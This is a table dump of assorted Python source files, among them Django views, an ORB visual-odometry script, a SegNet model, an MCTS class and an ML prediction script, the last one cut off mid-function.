index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,400 | 9770b437af921f6d213793f94d6a2628f08e8359 | #coding=utf8
from django.shortcuts import render,render_to_response
from django import forms
from django.conf import settings
from django.shortcuts import redirect
from django.http import HttpResponse,HttpResponseRedirect
from django.template import RequestContext
from django.contrib.auth import authenticate,login
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from .models import User,Passage
from django.http import JsonResponse
# Create your views here.
def login_view(request):
"""登录页面"""
if request.method == "POST":
uf = UserFormLogin(request.POST)
if uf.is_valid():
#获取表单信息
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username,password=password)
if user is not None: #如果用户存在
if user.is_active: #如果用户没有销户
global USERNAME
USERNAME = username
login(request,user)
return HttpResponseRedirect("/home.html/")
else:
error="该用户已经注销"
return render(request, "userlogin.html",{'error': error})
else:
error = "用户名或密码错误"
return render(request, "userlogin.html", {'error': error})
else:
uf = UserFormLogin()
return render(request,"userlogin.html")
def register(request):
#curtime=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime());
"""注册"""
if request.method == "POST":
uf = UserForm(request.POST)
if uf.is_valid():
#获取表单信息
username = uf.cleaned_data['username']
filterResult = User.objects.filter(username = username)
if len(filterResult)>0:
return render(request,'Register.html',{"errors":"用户名已存在"})
else:
password1 = uf.cleaned_data['password1']
password2 = uf.cleaned_data['password2']
if (password2 != password1):
return render(request,'Register.html',{'errors':"两次输入的密码不一致!"})
#将表单写入数据库
#password = password2
user = User.objects.create_user(username=username,password=password1)
user.save()
#返回注册成功页面
return HttpResponseRedirect("/login_view/")
return render(request,'Register.html')
@login_required #如果用户未认证,则返回登录页面
def home(request):
"""主页面,显示照片和故事"""
story = Passage.objects.order_by("-id")[0:8]
return render(request, 'home.html', {'story': story})
@login_required #如果用户未认证,则返回登录页面
def upload(request):
"""上传故事,照片"""
if request.method=="POST":
load = UpLoad(request.POST)
load2 = UpLoad2(request.POST)
if load.is_valid() or load2.is_valid():
titlex = request.POST['title']
passagex = request.POST['passage']
imgx=request.FILES.get('img')
up = Passage.objects.create(author=USERNAME,title=titlex, article=passagex,img=imgx)
up.save()
return HttpResponseRedirect("/home.html/")
else:
return render(request,'upload.html')
@login_required #如果用户未认证,则返回登录页面
def user_info(request):
"""个人信息页面,如果提交表单,就修改信息"""
if request.method=="POST":
first_name = request.POST['first_name']
sex = request.POST['sex']
motto = request.POST['motto']
photo = request.FILES.get('photo')
info = User.objects.get(username=USERNAME)
info.first_name = first_name
info.sex = sex
info.photo = photo
info.motto = motto
info.save()
return render(request, "user_info.html", {'info': info})
info = User.objects.get(username=USERNAME)
return render(request,"user_info.html",{'info': info})
def logout_view(request):
"""登出用户"""
logout(request)
return HttpResponseRedirect("/login_view")
class UserForm(forms.Form):
username = forms.CharField(label='用户名',max_length=100)
password1 = forms.CharField(label='密码',widget=forms.PasswordInput())
password2 = forms.CharField(label='确认密码',widget=forms.PasswordInput())
class UserFormLogin(forms.Form):
username = forms.CharField(label='用户名',max_length=100)
password = forms.CharField(label='密码',widget=forms.PasswordInput())
class UpLoad(forms.Form):
title = forms.CharField(label="标题",max_length=100)
passage = forms.Textarea()
img = forms.FileField()
class UpLoad2(forms.Form):
title = forms.CharField(label="标题",max_length=100)
passage = forms.Textarea()
|
991,401 | e7aa8d577042225c13a876d3721d017b9251b748 | import json
import requests
def joke():
URL = requests.get('https://v2.jokeapi.dev/joke/Programming,Miscellaneous,Dark,Pun,Spooky')
JSON_URL = URL.json()
if JSON_URL["type"] == "twopart":
print(JSON_URL["setup"])
print(JSON_URL["delivery"])
elif JSON_URL["type"] == "single":
print(JSON_URL["joke"])
RETRY = input("Do you want to hear another joke?(y/n): ")
if RETRY == "y":
joke()
elif RETRY == "n":
print("Alright then, have a nice day!")
exit()
else:
exit()
joke()
|
991,402 | f9c7b28f35bfc68c885856ee2470da86589e6687 | """
Question:
Please write a program using generator to print the numbers which can be divisible by 5 and 7 between 0 and n in comma separated form while n is input by console.
Example:
If the following n is given as input to the program:
100
Then, the output of the program should be:
0,35,70
Hints:
Use yield to produce the next value in generator.
In case of input data being supplied to the question, it should be assumed to be a console input.
"""
n = int(raw_input("Enter a number:"))
def foo(n):
for num in (i for i in range(n+1) if i % 5 == 0 and i % 7 == 0):
yield num
generated = []
for x in foo(n):
generated.append(x)
print ",".join(str(i) for i in generated)
|
991,403 | 418b348d31fadc2857df0bc4c04d964cdc7a1baf | #!/usr/bin/env python
import logging
import sys
from sklearn.feature_extraction.text import CountVectorizer
from sentiment_analysis.make_dataset import read_dataset
from sentiment_analysis.utils import write_pickle
def make_bag_of_words_features(
corpus_dataset_path,
training_dataset_path,
validation_dataset_path,
testing_dataset_path,
training_term_matrix_out_path,
validation_term_matrix_out_path,
testing_term_matrix_out_path,
max_features=5000):
"""Create a term-document matrix using the bag of words method.
Stop words are removed from the vocabulary.
Arguments:
corpus_dataset_path: The path to the TSV file holding the dataset from
which the vocabulary should be learned.
training_dataset_path: The path to the TSV file holding the training
dataset.
validation_dataset_path: The path to the TSV file holding the
validation dataset.
testing_dataset_path: The path to the TSV file holding the testing
dataset.
training_term_matrix_out_path: The path to save the training
term-document matrix to as a pickle file.
validation_term_matrix_out_path: The path to save the validation term-
document matrix to as a pickle file.
testing_term_matrix_out_path: The path to save the testing term-
document matrix to as a pickle file.
max_features: The maximum dimensionality of the feature vectors.
"""
corpus_dataset = read_dataset(corpus_dataset_path)
# Remove english stop words from the vocabulary.
vectorizer = CountVectorizer(analyzer='word', max_features=max_features,
stop_words='english')
# Learn the vocabualry.
vectorizer.fit(corpus_dataset['review'].values)
training_dataset = read_dataset(training_dataset_path)
validation_dataset = read_dataset(validation_dataset_path)
testing_dataset = read_dataset(testing_dataset_path)
training_term_matrix = vectorizer.transform(
training_dataset['review'].values)
validation_term_matrix = vectorizer.transform(
validation_dataset['review'].values)
testing_term_matrix = vectorizer.transform(
testing_dataset['review'].values)
write_pickle(training_term_matrix, training_term_matrix_out_path)
write_pickle(validation_term_matrix, validation_term_matrix_out_path)
write_pickle(testing_term_matrix, testing_term_matrix_out_path)
if __name__ == '__main__':
"""Create term matrices for the training, testing and validation sets using
the unlabeled datatest to learn the vocabulary.
Arguments:
unlabeled_dataset_path: The path to the TSV file holding the unlabeled
dataset.
training_dataset_path: The path to the TSV file holding the training
dataset.
validation_dataset_path: The path to the TSV file holding the
validation dataset.
testing_dataset_path: The path to the TSV file holding the testing
dataset.
training_term_matrix_out_path: The path to save the training
term-document matrix to as a pickle file.
validation_term_matrix_out_path: The path to save the validation term-
document matrix to as a pickle file.
testing_term_matrix_out_path: The path to save the testing term-
document matrix to as a pickle file.
"""
if len(sys.argv) != 8:
logging.error('Expected 7 arguments: unlabeled_dataset_path, ' +
'training_dataset_path, validation_dataset_path, ' +
'testing_dataset_path, training_term_matrix_out_path, ' +
'validation_term_matrix_out_path, ' +
'testing_term_matrix_out_path')
sys.exit(1)
unlabeled_dataset_path = sys.argv[1]
training_dataset_path = sys.argv[2]
validation_dataset_path = sys.argv[3]
testing_dataset_path = sys.argv[4]
training_term_matrix_out_path = sys.argv[5]
validation_term_matrix_out_path = sys.argv[6]
testing_term_matrix_out_path = sys.argv[7]
logging.info('unlabeled_dataset_path: {}'.format(unlabeled_dataset_path))
logging.info('training_dataset_path: {}'.format(training_dataset_path))
logging.info('validation_dataset_path: {}'.format(validation_dataset_path))
logging.info('testing_dataset_path: {}'.format(testing_dataset_path))
logging.info('training_term_matrix_out_path: {}'.format(
training_term_matrix_out_path))
logging.info('validation_term_matrix_out_path: {}'.format(
validation_term_matrix_out_path))
logging.info('testing_term_matrix_out_path: {}'.format(
testing_term_matrix_out_path))
make_bag_of_words_features(
unlabeled_dataset_path,
training_dataset_path,
validation_dataset_path,
testing_dataset_path,
training_term_matrix_out_path,
validation_term_matrix_out_path,
testing_term_matrix_out_path)
|
991,404 | cf59ee21080d1e56a2a36f8f382dd9eb82570683 | import nltk
import collections
from nltk import word_tokenize
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer
import numpy as np
from pptx import Presentation
import os
def prcoss(tokens):
count = nltk.defaultdict(int)
for word in tokens:
count[word] += 1
return count
def cos_sim(a, b):
dot_product = np.dot(a, b)
norm_a = np.linalg.norm(a)
norm_b = np.linalg.norm(b)
return dot_product / (norm_a * norm_b)
def getSimilarity(dict1, dict2):
all_words_list = []
for key in dict1:
all_words_list.append(key)
for key in dict2:
all_words_list.append(key)
all_words_list_size = len(all_words_list)
v1 = np.zeros(all_words_list_size, dtype=np.int)
v2 = np.zeros(all_words_list_size, dtype=np.int)
i = 0
for (key) in all_words_list:
v1[i] = dict1.get(key, 0)
v2[i] = dict2.get(key, 0)
i = i + 1
return cos_sim(v1, v2)
def word_tokenizer(text):
# tokenizes and stems the text
tokens = word_tokenize(text)
stemmer = PorterStemmer()
tokens = [stemmer.stem(t) for t in tokens if t not in stopwords.words('english')]
return tokens
def getPPTDetails(searchItem):
path = '/home/peter/Documents/myproject/media'
directory = [x for x in os.listdir(path) if x.endswith(".pptx")]
ppt = {}
for pptx_filename in directory:
prs = Presentation(path + '/' + pptx_filename)
# text_runs will be populated with a list of strings,
# one for each text run in presentation
text_runs = []
for slide in prs.slides:
sh = ''
for shape in slide.shapes:
if not shape.has_text_frame:
continue
for paragraph in shape.text_frame.paragraphs:
for run in paragraph.runs:
sh = sh + ' ' + run.text
if sh:
text_runs.append(sh.split('.'))
ppt[pptx_filename] = text_runs
result = []
for keys in ppt:
p = []
for i in range(0, len(ppt[keys])):
for j in range(0, len(ppt[keys][i])):
if getSimilarity(prcoss(word_tokenizer(ppt[keys][i][j])), prcoss(word_tokenizer(searchItem))) > 0.1:
p.append([ppt[keys][i][j], i + 1, j + 1])
if len(p):
result.append([keys, p])
return result
|
991,405 | 6df514e1662f986aee9e324d5a0479bbdcfaeec4 | from __future__ import print_function
from __future__ import absolute_import
import random
from .utils import rand_max
import copy
from .graph import StateNode
class MCTS(object):
"""
The central MCTS class, which performs the tree search. It gets a
tree policy, a default policy, and a backup strategy.
See e.g. Browne et al. (2012) for a survey on monte carlo tree search
"""
def __init__(self, tree_policy, default_policy, backup, game):
self.tree_policy = tree_policy
self.default_policy = default_policy
self.backup = backup
self.game = game
self.game_bak = copy.deepcopy(self.game)
def __call__(self, s, n=1000):
"""
Run the monte carlo tree search.
:param root: The StateNode
:param n: The number of roll-outs to be performed
:return:
"""
root = StateNode(None, s, self.game)
if root.parent is not None:
raise ValueError("Root's parent must be None.")
for _ in range(n):
#selection
node = _get_next_node(root, self.tree_policy)
#simulation
node.reward = self.default_policy(node)
#print(node.reward)
#back
self.backup(node)
root.reset(copy.deepcopy(self.game_bak))
#for i in root.children:
# print(root.children[i].__dict__)
# for j in root.children[i].children:
# print(root.children[i].children[j].__dict__)
# print("=======")
return rand_max(root.children.values(), key=lambda x: x.q).action, rand_max(root.children.values(), key=lambda x: x.q).q
def _expand(state_node):
action = random.choice(state_node.untried_actions)
action = state_node.untried_actions[0]
#print(action)
return state_node.children[action].sample_state()
def _best_child(state_node, tree_policy):
best_action_node = rand_max(state_node.children.values(),
key=tree_policy)
return best_action_node.sample_state()
def _get_next_node(state_node, tree_policy):
while not state_node.is_terminal():
if state_node.untried_actions:
return _expand(state_node)
else:
state_node = _best_child(state_node, tree_policy)
return state_node
|
991,406 | 6cd56359a2d5491b58dd5f061c39b1782a03feb3 | from .entity import Entity
from .weapon import Weapon
from ..tools import sf, gen_texture
class Ship(Entity):
def __init__(self, x=20, y=20):
texture = gen_texture(x, y)
super().__init__(texture)
self.weapon = Weapon()
def shoot(self, board):
projectile = self.weapon.use(self.position, self.velocity, self.rotation, self.ident)
if projectile is not None:
board.queue(projectile)
def collide(self, other):
other.damage(self.velocity)
|
991,407 | 6044e0f4ebb3537e5d50988ce854700ea540f104 | import numpy as np
import cv2
import pyrealsense2 as rs
from ORB_VO.pso import PSO
THRESHHOLD = 30
FEATUREMAX = 200
INLIER_DIST_THRE = 10
class Optimizer:
def __init__(self, featureA, featureB, matches, intrin):
self.featureA = featureA
self.featureB = featureB
self.matches = matches
self.listA = []
self.listB = []
self.intrin = intrin
def get_list(self):
"""This method get the list A and B by rs.deproject function"""
for match in self.matches:
img_pixel = [int(self.featureA[match.queryIdx].pt[0]), int(self.featureA[match.queryIdx].pt[1])]
depth = aligned_depth_frame.get_distance(img_pixel[0], img_pixel[1])
point_a = rs.rs2_deproject_pixel_to_point(self.intrin, img_pixel, depth)
point_a = [point_a[0], point_a[2], 1]
img_pixel = [int(self.featureB[match.trainIdx].pt[0]), int(self.featureB[match.trainIdx].pt[1])]
depth = aligned_depth_frame.get_distance(img_pixel[0], img_pixel[1])
point_b = rs.rs2_deproject_pixel_to_point(self.intrin, img_pixel, depth)
point_b = [point_b[0], point_b[2], 1]
self.listA.append(point_a)
self.listB.append(point_b)
def optimize(self):
"""PSO method"""
pso_optimizer = PSO(population_size=50,max_steps=50,pA=self.listA,pB=self.listB)
self.optimzed_result = pso_optimizer.evolve()
class ORBDetector:
def __init__(self, frame):
self.featureFrameA = []
self.featureFrameB = []
self.featureDesA = []
self.featureDesB = []
self.frameA = []
self.frameB = frame
self.orb = cv2.ORB_create(nfeatures=FEATUREMAX, fastThreshold=THRESHHOLD)
self.score = []
self.bfMatcher = cv2.BFMatcher_create(normType=cv2.NORM_HAMMING, crossCheck=True)
self.match = []
self.W = []
self.best_matches = []
def detect_features(self):
"""Detect features and calculate the descriptors"""
# P.S. the features and descriptors of frame A are calculated beforehand
self.featureFrameB, self.featureDesB = self.orb.detectAndCompute(self.frameB, None)
def match_features(self):
"""This method match the features using BrutalForce and sort them by similarity
and only take the strongest 50"""
type_of_None = type(None)
if type(self.featureDesA) != type_of_None and type(self.featureDesB) != type_of_None:
matches = self.bfMatcher.match(self.featureDesA, self.featureDesB)
self.match = sorted(matches, key=lambda x: x.distance)
self.match = self.match[:50]
else:
self.match = []
def find_most_compatible_match(self, candidate):
"""This method loop through candidate to find matches which has most compatible number"""
best_matchIdx = -1
best_matchVal = 0
len_of_match = len(self.match)
if not candidate.any():
return None
for i in candidate:
if self.W[len_of_match][i] > best_matchVal:
best_matchVal = self.W[len_of_match][i]
best_matchIdx = i
return best_matchIdx
def find_inlier(self):
"""This method execute the A4 step of the journal"""
len_of_matches = len(self.match)
# The last line of W stores the whole number of consistency of this match
self.W = np.zeros((len_of_matches+1, len_of_matches))
for i in np.arange(len_of_matches):
for j in np.arange(len_of_matches):
if i >= j:
continue
# ASSUMPTION : the index of descriptor is the same with the index of image
wa = self.featureFrameA[self.match[i].queryIdx].pt[0]-self.featureFrameA[self.match[j].queryIdx].pt[0]
wb = self.featureFrameA[self.match[i].queryIdx].pt[1]-self.featureFrameA[self.match[j].queryIdx].pt[1]
wa_ = self.featureFrameB[self.match[i].trainIdx].pt[0]-self.featureFrameB[self.match[j].trainIdx].pt[0]
wb_ = self.featureFrameB[self.match[i].trainIdx].pt[1]-self.featureFrameB[self.match[j].trainIdx].pt[1]
# Compare and complete the matrix W
if abs(wa-wa_) + abs(wb-wb_) <= INLIER_DIST_THRE:
self.W[i, j] = 1
self.W[j, i] = 1
self.W[len_of_matches, j] += 1
# Choose the best inlier features
self.best_matches = []
candidate = np.arange(len_of_matches)
while True:
best_matchIdx = self.find_most_compatible_match(candidate)
if not best_matchIdx or best_matchIdx == -1: # in case no best match is found
break
else:
self.best_matches.append(self.match[best_matchIdx])
candidate = np.delete(candidate, np.where(candidate == best_matchIdx), axis=0)
def set_frame(self, frame_next):
"""This method is applied after each frame is processed intending for reduce the calculation cost
Refer to the jounal : A2 step last paragraph"""
self.featureDesA = self.featureDesB
self.featureFrameA = self.featureFrameB
self.frameA = self.frameB
self.frameB = frame_next
if __name__ == "__main__":
pipe = rs.pipeline()
config = rs.config()
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
profile = pipe.start(config)
# Unused line, intending for access to the intrinsic parameter of the camera
profile = pipe.get_active_profile()
# Getting the depth sensor's depth scale. Real dist / scale = depth_frame_dist
depth_sensor = profile.get_device().first_depth_sensor()
depth_scale = depth_sensor.get_depth_scale()
# Align object creation
align_to = rs.stream.color
align = rs.align(align_to)
# Skip the first five frame for stable usage.
for i in np.arange(5):
frames = pipe.wait_for_frames()
iterCount = 0
while True:
# Wait for a coherent pair of frames: depth and color
frames = pipe.wait_for_frames()
# Align the depth frame and color frame
aligned_frames = align.process(frames)
aligned_depth_frame = aligned_frames.get_depth_frame()
color_frame = aligned_frames.get_color_frame()
if not aligned_depth_frame or not color_frame:
continue
# Intrinsics & Extrinsics
depth_intrin = aligned_depth_frame.profile.as_video_stream_profile().intrinsics
color_intrin = color_frame.profile.as_video_stream_profile().intrinsics
depth_to_color_extrin = aligned_depth_frame.profile.get_extrinsics_to(
color_frame.profile)
# Convert images to numpy arrays
depth_image = np.asanyarray(aligned_depth_frame.get_data())
color_image = np.asanyarray(color_frame.get_data())
# Detect the ORB features by Opencv2 using orb method and match them
# Corresponding to the A2-A3 steps in the journal
if iterCount == 0:
orb_detector = ORBDetector(color_image)
orb_detector.detect_features()
else:
# Update a new frame by set_frame()
orb_detector.set_frame(color_image)
orb_detector.detect_features()
orb_detector.match_features()
if orb_detector.match.__len__() != 0:
orb_detector.find_inlier()
# Draw the features on the image for debugging
# image = cv2.drawKeypoints(color_image, orb_detector.featureFrameB, color_image, color=(255, 0, 0))
if iterCount != 0:
image = cv2.drawMatches(orb_detector.frameA, orb_detector.featureFrameA,
orb_detector.frameB, orb_detector.featureFrameB,
orb_detector.best_matches, orb_detector.frameA)
cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
cv2.imshow('RealSense', image)
cv2.waitKey(10)
# Optimize to calculate the transition matrix
optimizer = Optimizer(orb_detector.featureFrameA, orb_detector.featureFrameB, orb_detector.best_matches,
depth_intrin)
if iterCount != 0:
optimizer.get_list()
optimizer.optimize()
# For the test of depth convert
depth = aligned_depth_frame.get_distance(240, 320)
result = depth_image[240, 320]
# Update the iterCount
# print(orb_detector.best_matches)
# print(orb_detector.featureFrameA)
if iterCount <= 1000:
iterCount += 1
orb_detector.best_matches = []
|
991,408 | 21bf0e36a823c29119142c5ef199a2b14ec3ca3b | import torch.nn.functional as F
from torch import nn
from torchvision import models
class SegNet(nn.Module):
def __init__(self, num_classes, pretrained=False, fix_weights=False):
super(SegNet, self).__init__()
self.name = "true_segnet"
self.num_classes = num_classes
# vgg = models.vgg16_bn(pretrained=pretrained)
# features = list(vgg.features.children())
# maxpool = nn.MaxPool2d(2, 2, return_indices=True)
# Encoder
self.conv11 = nn.Conv2d(3, 64, 3, padding=1)
self.bn11 = nn.BatchNorm2d(64)
self.conv12 = nn.Conv2d(64, 64, 3, padding=1)
self.bn12 = nn.BatchNorm2d(64)
self.conv21 = nn.Conv2d(64, 128, 3, padding=1)
self.bn21 = nn.BatchNorm2d(128)
self.conv22 = nn.Conv2d(128, 128, 3, padding=1)
self.bn22 = nn.BatchNorm2d(128)
self.conv31 = nn.Conv2d(128, 256, 3, padding=1)
self.bn31 = nn.BatchNorm2d(256)
self.conv32 = nn.Conv2d(256, 256, 3, padding=1)
self.bn32 = nn.BatchNorm2d(256)
self.conv33 = nn.Conv2d(256, 256, 3, padding=1)
self.bn33 = nn.BatchNorm2d(256)
self.conv41 = nn.Conv2d(256, 512, 3, padding=1)
self.bn41 = nn.BatchNorm2d(512)
self.conv42 = nn.Conv2d(512, 512, 3, padding=1)
self.bn42 = nn.BatchNorm2d(512)
self.conv43 = nn.Conv2d(512, 512, 3, padding=1)
self.bn43 = nn.BatchNorm2d(512)
self.conv51 = nn.Conv2d(512, 512, 3, padding=1)
self.bn51 = nn.BatchNorm2d(512)
self.conv52 = nn.Conv2d(512, 512, 3, padding=1)
self.bn52 = nn.BatchNorm2d(512)
self.conv53 = nn.Conv2d(512, 512, 3, padding=1)
self.bn53 = nn.BatchNorm2d(512)
# Decoder
self.conv53d = nn.Conv2d(512, 512, 3, padding=1)
self.bn53d = nn.BatchNorm2d(512)
self.conv52d = nn.Conv2d(512, 512, 3, padding=1)
self.bn52d = nn.BatchNorm2d(512)
self.conv51d = nn.Conv2d(512, 512, 3, padding=1)
self.bn51d = nn.BatchNorm2d(512)
self.conv43d = nn.Conv2d(512, 512, 3, padding=1)
self.bn43d = nn.BatchNorm2d(512)
self.conv42d = nn.Conv2d(512, 512, 3, padding=1)
self.bn42d = nn.BatchNorm2d(512)
self.conv41d = nn.Conv2d(512, 256, 3, padding=1)
self.bn41d = nn.BatchNorm2d(256)
self.conv33d = nn.Conv2d(256, 256, 3, padding=1)
self.bn33d = nn.BatchNorm2d(256)
self.conv32d = nn.Conv2d(256, 256, 3, padding=1)
self.bn32d = nn.BatchNorm2d(256)
self.conv31d = nn.Conv2d(256, 128, 3, padding=1)
self.bn31d = nn.BatchNorm2d(128)
self.conv22d = nn.Conv2d(128, 128, 3, padding=1)
self.bn22d = nn.BatchNorm2d(128)
self.conv21d = nn.Conv2d(128, 64, 3, padding=1)
self.bn21d = nn.BatchNorm2d(64)
self.conv12d = nn.Conv2d(64, 64, 3, padding=1)
self.bn12d = nn.BatchNorm2d(64)
self.conv11d = nn.Conv2d(64, num_classes, 3, padding=1)
if pretrained:
self.initialize_weights(fix_weights)
def forward(self, x):
# maxpool = nn.MaxPool2d(2, 2, return_indices=True)
# maxunpool = nn.MaxUnpool2d(2, 2)
x = F.relu(self.bn11(self.conv11(x)))
x = F.relu(self.bn12(self.conv12(x)))
size1 = x.size()
x, id1 = F.max_pool2d(x, 2, 2, return_indices=True)
x = F.relu(self.bn21(self.conv21(x)))
x = F.relu(self.bn22(self.conv22(x)))
size2 = x.size()
x, id2 = F.max_pool2d(x, 2, 2, return_indices=True)
x = F.relu(self.bn31(self.conv31(x)))
x = F.relu(self.bn32(self.conv32(x)))
x = F.relu(self.bn33(self.conv33(x)))
size3 = x.size()
x, id3 = F.max_pool2d(x, 2, 2, return_indices=True)
x = F.relu(self.bn41(self.conv41(x)))
x = F.relu(self.bn42(self.conv42(x)))
x = F.relu(self.bn43(self.conv43(x)))
size4 = x.size()
x, id4 = F.max_pool2d(x, 2, 2, return_indices=True)
x = F.relu(self.bn51(self.conv51(x)))
x = F.relu(self.bn52(self.conv52(x)))
x = F.relu(self.bn53(self.conv53(x)))
size5 = x.size()
x, id5 = F.max_pool2d(x, 2, 2, return_indices=True)
# Decoding
x = F.max_unpool2d(x, id5, 2, 2, output_size=size5)
x = F.relu(self.bn53d(self.conv53d(x)))
x = F.relu(self.bn52d(self.conv52d(x)))
x = F.relu(self.bn51d(self.conv51d(x)))
x = F.max_unpool2d(x, id4, 2, 2, output_size=size4)
x = F.relu(self.bn43d(self.conv43d(x)))
x = F.relu(self.bn42d(self.conv42d(x)))
x = F.relu(self.bn41d(self.conv41d(x)))
x = F.max_unpool2d(x, id3, 2, 2, output_size=size3)
x = F.relu(self.bn33d(self.conv33d(x)))
x = F.relu(self.bn32d(self.conv32d(x)))
x = F.relu(self.bn31d(self.conv31d(x)))
x = F.max_unpool2d(x, id2, 2, 2, output_size=size2)
x = F.relu(self.bn22d(self.conv22d(x)))
x = F.relu(self.bn21d(self.conv21d(x)))
x = F.max_unpool2d(x, id1, 2, 2, output_size=size1)
x = F.relu(self.bn12d(self.conv12d(x)))
x = self.conv11d(x)
return x
def initialize_weights(self, fix_weights):
vgg = models.vgg16_bn(pretrained=True)
vgg_layers = [c for c in vgg.features.children() if isinstance(c, nn.Conv2d) or isinstance(c, nn.BatchNorm2d)]
segnet_layers = list(self._modules.values())
i = 0
for l in vgg_layers:
if isinstance(l, nn.Conv2d) or isinstance(l, nn.BatchNorm2d):
segnet_layers[i].weight = l.weight
segnet_layers[i].bias = l.bias
if isinstance(l, nn.BatchNorm2d):
segnet_layers[i].running_mean = l.running_mean
segnet_layers[i].running_var = l.running_var
# Fix weights of VGG
if fix_weights:
for param in segnet_layers[i].parameters():
param.requires_grad = False
i += 1
|
991,409 | 331e262af450ca3ddd3df3a68d4af10ad828bffe | # SECTION PROCESS - Processes command line arguments.
# =====================================================
def resolve(args = [], type = ''):
# Get the index of the type to resolve
index = {'command': 0, 'argument': 1}[type]
# Ensure the args list has enough items
if len(args) > index:
# Return the item
return args[index]
return None
|
991,410 | 2b9d4ef4683908f662c5ea1e05a8e7261df1991a | from rest_framework import viewsets
from .models import Restaurant
from .serializers import RestaurantSerializer
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.decorators import action
class RestaurantViewSet(viewsets.ModelViewSet):
queryset = Restaurant.objects.all().prefetch_related(
'categories', 'categories__foods')
serializer_class = RestaurantSerializer
def list(self, request):
if request.query_params == {}:
queryset = Restaurant.objects.all()
else:
query = request.query_params['search']
queryset = Restaurant.objects.filter(name__icontains=query)
serializer = RestaurantSerializer(
queryset, many=True, fields=('id', 'name', 'address',))
return Response(serializer.data)
def create(self, request):
if not request.user.is_restaurant:
return Response({'message': 'unauthorized'}, 401)
serializer = RestaurantSerializer(
data=request.data, fields=('id', 'name', 'address',))
if not serializer.is_valid():
return Response(serializer.errors)
serializer.save(user=request.user)
return Response(serializer.data)
def get_permissions(self):
if self.action == 'list' or self.action == 'retrieve':
permission_classes = [AllowAny]
else:
permission_classes = [IsAuthenticated]
return [permission() for permission in permission_classes]
|
991,411 | 8268108044f9b1abe5153e912348d139601fa44d | from preprocess.load_data.data_loader import load_hotel_reserve
customer_tb, hotel_tb, reserve_tb = load_hotel_reserve()
# 下の行から本書スタート
# 予約回数を計算(「3-1 データ数、種類数の算出」の例題を参照)
rsv_cnt_tb = reserve_tb.groupby('hotel_id').size().reset_index()
rsv_cnt_tb.columns = ['hotel_id', 'rsv_cnt']
# 予約回数をもとに順位を計算
# ascendingをFalseにすることで降順に指定
# methodをminに指定し、同じ値の場合は取り得る最小順位に指定
rsv_cnt_tb['rsv_cnt_rank'] = rsv_cnt_tb['rsv_cnt'] \
.rank(ascending=False, method='min')
# 必要のないrsv_cntの列を削除
rsv_cnt_tb.drop('rsv_cnt', axis=1, inplace=True)
|
991,412 | 82619ab5ee680d769095c69db3915a0d20da96c5 |
MOD = 10 ** 9 + 7
import math
__author__ = 'Danyang'
class Solution(object):
def solve(self, cipher):
N, M = cipher
return math.factorial(N + M - 1) / math.factorial(N) / math.factorial(M - 1) % MOD
if __name__ == "__main__":
import sys
f = open("1.in", "r")
testcases = int(f.readline().strip())
for t in xrange(testcases):
cipher = map(int, f.readline().strip().split(' '))
s = "%s\n" % (Solution().solve(cipher))
print s,
|
991,413 | bbffff9dbe29982994c8edd101db86dc44786d6c | """
This module is one of the two entrypoints with train.py
It is used to make predictions using our model.
"""
import pickle
import logging
from typing import Union
from warnings import simplefilter
import pandas as pd
from pandas.core.common import SettingWithCopyWarning
import src.config.base as base
import src.config.column_names as col
from src.domain.cleaning import correct_wrong_entries, impute_missing_eco_data
from src.infrastructure.build_dataset import DataBuilderFactory, DataMerger
# Ignorer les warnings pour améliorer la lisibilité
simplefilter(action="ignore", category=FutureWarning)
simplefilter(action="ignore", category=SettingWithCopyWarning)
def load_pipeline():
"""Loads model from pickle file."""
try:
logging.info("Loading the fitted pipeline...")
with open(base.SAVED_MODEL_PATH, "rb") as model_file:
pipeline = pickle.load(model_file)
logging.info("Loading completed successfully...")
except FileNotFoundError:
logging.error("Model file has not been found.")
raise
return pipeline
def main(prediction_data_path=base.PREDICT_CLIENT_DATA_PATH, run_type: str = "normal"):
# Builds datasets.
logging.info("Building datasets...")
client_builder = DataBuilderFactory(
prediction_data_path, base.config_client_data, base.ALL_CLIENT_DATA_TRANSLATION
)
client_data = client_builder.preprocess_data().data
eco_builder = DataBuilderFactory(base.PREDICT_ECO_DATA_PATH, base.config_eco_data)
eco_data = eco_builder.preprocess_data().data
logging.info("Preprocessing...")
# Imputes NaN from the eco dataset.
# This step is done outside the pipeline to avoid duplication of NaN while merging.
eco_data = impute_missing_eco_data(eco_data)
# Fixes erroneous entries in client dataset.
client_data = correct_wrong_entries(
client_data, base.config_client_data.get("wrong_entries")
)
# Merges client and eco datasets.
logging.info("Merging client and eco datasets...")
merged = DataMerger(client_data, eco_data, col.MERGER_FIELD)
merged.merge_datasets()
X_pred = merged.joined_datasets
if col.TARGET in X_pred.columns:
X_pred.drop(col.TARGET, axis=1, inplace=True)
# Loads pipeline.
pipeline = load_pipeline()
# Makes predictions.
X_pred.dropna(axis=0)
y_pred = pipeline.predict(X_pred)
# Writes predictions.
if run_type == "normal":
y_pred = pd.Series(y_pred)
y_pred.to_csv(base.PREDICTIONS_FILE_PATH)
elif run_type == "api":
if y_pred[0] == 0:
return "N'a pas souscrit"
elif y_pred[0] == 1:
return "A souscrit"
if __name__ == "__main__":
main()
|
991,414 | d643a01e1f285780f20512c7809f0f316c1692bf | from typing import Iterable, Tuple, List, Callable, Union
from Day02.task import Mode, IntMachine, CustomList, work_code
from Day17.task import my_machine
from Day19 import INPUT
from helper import Iterator, Point, get_all_combs
from main import custom_print as custom_printer
def get_affected_pos(inp: Union[List[int], str, CustomList], machine: IntMachine, test_pos: Iterable[Point]) -> List[
Point]:
deploy_machine = machine.copy()
deploy_machine.reset_machine()
ret: List[Tuple[int, int]] = []
it = Iterator(0)
point = Point(0, 0)
def custom_write(read_code: List[int], loc: int, modes: Callable[[int], Mode]) -> Tuple[bool, int]:
value = modes(1).read(read_code, loc + 1)
if value == 1:
ret.append(point.copy())
return False, loc + 2
def custom_read(read_code: List[int], loc: int, modes: Callable[[int], Mode]) -> Tuple[bool, int]:
modes(1).write(read_code, loc + 1, point[it.get() % len(point)])
it.increase()
